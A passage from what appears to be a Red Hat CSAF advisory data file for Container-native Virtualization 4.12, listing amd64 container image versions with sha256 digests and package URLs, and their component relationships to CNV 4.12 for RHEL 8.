"pkg:oci/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", product: { name: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", product_id: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.12.0-71", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", product_id: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", product: { name: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", product_id: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", product_identification_helper: { purl: "pkg:oci/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-exportproxy&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", product: { name: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", product_id: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", product_identification_helper: { purl: "pkg:oci/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-exportserver&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", product_id: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", product_id: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.12.0-10", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", product_id: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", product_identification_helper: { purl: "pkg:oci/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", product: { name: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", product_id: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", product_identification_helper: { purl: "pkg:oci/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-network-latency-checkup&tag=v4.12.0-89", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", }, product_reference: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64 as a component of CNV 4.12 for RHEL 8", product_id: 